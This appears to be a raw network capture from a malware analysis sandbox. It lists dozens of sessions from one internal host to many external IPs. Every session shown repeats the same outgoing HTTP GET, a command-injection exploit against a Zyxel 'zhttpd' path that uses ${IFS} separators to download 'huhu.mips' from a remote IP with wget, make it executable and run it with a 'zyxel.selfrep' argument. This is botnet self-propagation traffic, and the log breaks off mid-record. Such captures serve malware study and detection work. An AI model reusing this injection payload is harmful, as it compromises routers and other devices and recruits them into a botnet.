                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924217939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4352192.168.2.1447146221.32.45.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924257994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4353192.168.2.1453572187.75.252.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924304008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4354192.168.2.1445394163.25.117.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924352884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4355192.168.2.1436230131.38.176.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924376965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4356192.168.2.1442388216.231.14.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924427986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4357192.168.2.1433394157.111.0.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924464941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4358192.168.2.1457006140.218.98.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924509048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4359192.168.2.1440010133.76.242.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924527884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4360192.168.2.145510040.237.37.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924588919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4361192.168.2.144750435.86.123.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924623966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4362192.168.2.144683257.220.217.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924654961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4363192.168.2.1449706200.221.167.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924690008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4364192.168.2.1443368116.174.103.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924731970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4365192.168.2.1440054208.191.238.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924762964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4366192.168.2.145997869.185.188.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924804926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4367192.168.2.1453460208.57.21.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924841881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4368192.168.2.144018470.103.250.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924887896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4369192.168.2.1435794173.154.171.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924911976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4370192.168.2.1459168179.238.126.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.924948931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4371192.168.2.1440338129.109.64.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925002098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4372192.168.2.1447650163.198.219.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925024986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4373192.168.2.1448764103.87.141.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925102949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4374192.168.2.143321618.71.196.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925102949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4375192.168.2.143555060.29.128.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925165892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4376192.168.2.145428497.62.235.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925204039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4377192.168.2.144260812.250.19.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925249100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4378192.168.2.1459450190.227.10.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925301075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4379192.168.2.1450908212.66.125.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925321102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4380192.168.2.1439606145.212.206.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925353050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4381192.168.2.14392481.78.65.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925419092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4382192.168.2.1441052170.18.208.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925451994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4383192.168.2.143900632.120.144.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925493956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4384192.168.2.145031472.141.227.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925517082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4385192.168.2.1452462218.1.93.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925561905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4386192.168.2.1460502105.218.99.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925606966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4387192.168.2.1450758104.135.23.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925661087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4388192.168.2.1459080192.186.215.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925708055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4389192.168.2.145903885.104.50.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925765038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4390192.168.2.143713251.180.40.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925781012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4391192.168.2.144929414.117.110.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925810099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4392192.168.2.14580844.146.226.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925900936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4393192.168.2.143610865.6.95.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925937891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4394192.168.2.1456614219.95.158.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.925981045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4395192.168.2.1447846189.9.159.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926021099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4396192.168.2.145294836.88.55.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926059008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4397192.168.2.1449068217.192.148.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926100016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4398192.168.2.1453430200.44.201.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926126957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4399192.168.2.1457388210.63.80.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926197052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4400192.168.2.1437856104.20.18.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926248074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4401192.168.2.145816084.133.137.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926276922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4402192.168.2.1440948141.151.107.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926326990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4403192.168.2.145682270.101.135.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926350117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4404192.168.2.1453362148.10.229.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926383018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4405192.168.2.14548462.18.25.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926461935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4406192.168.2.1450726203.104.110.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926487923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4407192.168.2.143297694.160.5.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926544905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4408192.168.2.1438764170.235.218.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926584005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4409192.168.2.145979613.151.68.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926614046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4410192.168.2.144139032.99.85.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926651955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4411192.168.2.1444604118.76.15.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926678896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4412192.168.2.1457254124.41.167.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926738024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4413192.168.2.143842434.164.183.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926772118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4414192.168.2.1452906199.131.69.103443
                                                        TimestampBytes transferredDirectionData
